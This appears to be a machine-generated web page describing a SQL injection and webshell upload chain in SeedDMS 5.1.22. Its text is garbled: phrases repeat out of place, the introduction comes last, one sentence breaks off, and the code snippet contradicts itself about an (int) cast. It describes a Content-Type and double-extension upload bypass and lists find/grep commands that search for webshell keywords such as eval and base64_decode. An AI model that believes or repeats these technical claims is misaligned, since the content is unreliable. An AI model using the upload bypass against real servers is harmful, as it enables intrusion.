Seeddms 5.1.22 Exploit

The most dangerous vulnerability in SeedDMS 5.1.22 is a Time-Based Blind SQL Injection found in the op/op.RemoveDocument.php and op/op.RemoveFolder.php endpoints. The issue arises because user-supplied input via the documentid or folderid parameter is directly concatenated into SQL queries without sanitization or parameterized queries.

Specifically, the code snippet from op.RemoveDocument.php (simplified):

$documentid = (int) $_GET['documentid']; // Insufficient casting bypass
$query = "SELECT * FROM `tblDocuments` WHERE `id` = " . $_GET['documentid'];

Attackers can bypass the (int) cast using SQL comment characters or encoding tricks, leading to classic Boolean/Time-based injection.

After compromising admin credentials (via SQLi or brute force), the attacker can achieve RCE. seeddms 5.1.22 exploit

Recursively search for PHP files in the data/ directory:

find /var/www/seeddms/data -name "*.php" -type f

(Note: SeedDMS never stores legitimate PHP files there.)

Check for abnormally small or obfuscated files: The most dangerous vulnerability in SeedDMS 5

find /var/www/seeddms/data -type f -size -10k -exec grep -l "eval\|system\|base64_decode" {} \;

Even if a session check existed, the upload validation relied on:

By setting Content-Type: image/jpeg but uploading a .php file (or using a double extension like .php.jpeg), an attacker could bypass the rudimentary filters.

| Aspect | Severity | |--------------------------|------------------------------------------------------------------------------| | CVSS Score (est.) | 9.8 (Critical) – AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | | Authentication | None required | | User Interaction | None | | Complexity | Low (basic HTTP request forgery) | | Data Exposure | Full document repository + system files + DB credentials | | Persistence | High – webshell persists across reboots until manual deletion | Attackers can bypass the (int) cast using SQL

In a real-world audit, this exploit allowed full access to HR records, financial PDFs, and even the SeedDMS user table (password hashes, unsalted in older versions).

Monitor for GET requests from the SeedDMS server to unusual external IPs (C2 callbacks) or DNS lookups for suspicious domains.

Seeddms is an open-source document management system. A public exploit targeting version 5.1.22 (CVE-class style) has circulated, allowing remote attackers to achieve unauthorized access by chaining an input-validation flaw with weak access controls. Below is a concise, technical overview suitable for a security blog or advisory.